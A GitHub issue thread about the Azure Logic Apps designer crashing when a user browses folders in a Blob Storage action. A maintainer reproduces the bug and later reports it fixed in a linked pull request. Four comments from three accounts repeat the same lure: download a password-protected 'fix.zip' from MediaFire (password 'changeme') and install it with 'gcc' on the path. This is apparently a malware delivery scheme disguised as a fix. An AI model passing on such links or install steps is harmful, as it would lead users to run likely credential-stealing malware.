### ISSUE TITLE
Azure Blob Storage Actions are not allowing navigation through the folders 

### ISSUE THREAD

**Issue by ayenigalla94** [Azure/LogicAppsUX#5504]
### Describe the Bug with repro steps 

Go to Create New Blob 

 Navigate into a folder in the blob storage directory, any folder

 Entire designer crashes

### What type of Logic App Is this happening in? 

Consumption (Portal)

### Which operating system are you using? 

Windows

### Are you using new designer or old designer 

New Designer

### Did you refer to the TSG before filing this issue? [https://aka.ms/lauxtsg](<https://aka.ms/lauxtsg>) 

Yes

### Workflow JSON 

*No response*

### Screenshots or Videos 

*No response*

### Browser 

Chrome

### Additional context 

*No response*

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ccastrotrejo** [comment]
Hi @ayenigalla94 Those this happens in old or new designer for consumption?

**Comment by ccastrotrejo** [comment]
Hi @ayenigalla94 , thanks for raising this issue. I was just able to repro this issue. In the meantime please continue using the old designer

**Comment by ccastrotrejo** [comment]
Hi @ayenigalla94 this issue was fixed in this PR https://github.com/Azure/LogicAppsUX/pull/5580. We will be relesing the fix  in the upcoming week
